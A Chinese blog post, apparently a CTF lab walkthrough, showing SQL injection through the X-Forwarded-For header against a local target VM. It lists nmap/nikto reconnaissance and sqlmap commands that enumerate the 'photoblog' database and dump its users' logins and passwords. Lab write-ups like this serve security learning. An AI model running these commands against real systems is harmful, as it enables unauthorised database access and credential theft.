-
CTF-sql注入(X-Forwarded-For)【简单易懂】
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
目录
环境配置
kali 192.168.20.128
靶机 192.168.20.132
链接:https://pan.baidu.com/s/1vUYqkBnWkrfXvdC99nOsSQ
提取码:4p7w信息探测
nmap -sV ip
nmap -A -v ip
nikto -host http://ip 探测敏感信息
AWVS漏洞扫描
链接:https://pan.baidu.com/s/1o_2nXdQOuDFE8jI1uQdPiw
提取码:jsdx
漏洞利用
扫描数据库
sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" --dbs --batch
扫描表名
sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" --tables --batch
扫描字段值
sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" --columns --batch
扫描用户名和密码
sqlmap -u "http://192.168.20.132" --headers="X-Forwarded-For:*" -D "photoblog" -T "users" -C 'login,password' --dump --batch
-
相关阅读:
高斯消元总结
unity图片`fillAmount`填充方法
Linux下交叉编译工具链的安转和配置总结
MySql 怎么查出符合条件的最新的数据行?
leetcode 47. 全排列 II(java)
Vue安装并使用Vue-CLI构建SPA项目并实现路由
互联网医院|医疗系统新模式改善看病效率
来自男装的“制服诱惑”,这波设计够酷
十大经典排序算法——插入排序与希尔排序(超详解)
group by 与 order by的用法
- 原文地址:https://blog.csdn.net/m0_63127854/article/details/126446929